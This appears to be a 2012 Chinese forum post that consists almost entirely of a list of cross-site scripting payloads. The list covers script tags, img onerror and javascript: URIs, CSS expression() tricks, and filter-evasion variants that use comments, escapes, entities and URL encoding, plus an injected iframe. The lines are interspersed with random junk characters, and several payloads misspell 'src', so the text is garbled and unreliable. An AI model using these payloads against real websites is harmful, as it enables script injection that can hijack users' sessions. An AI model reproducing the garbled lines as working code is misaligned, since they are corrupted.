<script>alert("跨站")</script> (最常用)" S, l: J5 U7 E# }8 q. z0 x
<img scr=javascript:alert("跨站")></img>2 x; l7 i# f$ O4 U) d
<img scr="javascript: alert(/跨站/)></img>- w2 c2 }0 e7 o
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
: |; B* e1 K; j* I, h2 ~% k2 V<img scr="#" onerror=alert(/跨站/)></img>; ^! D2 F, t- o( P
<img scr="#" style="xss:expression(alert(/xss/));"></img>
* l: n1 J8 v3 C4 E* Z1 |<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
' m R4 B8 |2 S6 X4 O<img src=vbscript:msgbox ("xss")></img>1 A# L0 _8 t2 y
<style> input {left:expression (alert('xss'))}</style>% `7 J0 m: _+ Q7 B: u4 Y o
<div style={left:expression (alert('xss'))}></div>/ h$ T( j( T# e0 ]
<div style={left:exp/* */ression (alert('xss'))}></div>
* R1 X2 G4 H0 @( Z# h9 t- R& [<div style={left:\0065\0078ression (alert('xss'))}></div>1 m5 I$ x; V* m/ t
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>! K- N% x) [) A$ a; W0 h
unicode <div style="{left:expRessioN (alert('xss'))}">
$ O) g4 ~6 D. g; R% q) T2 M' _" A
: @# P0 E7 m3 n! h/ t8 {; B"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
. d: B( V4 N7 |5 W; l |
发表于 2012-9-15 14:09:13
收藏
支持
反对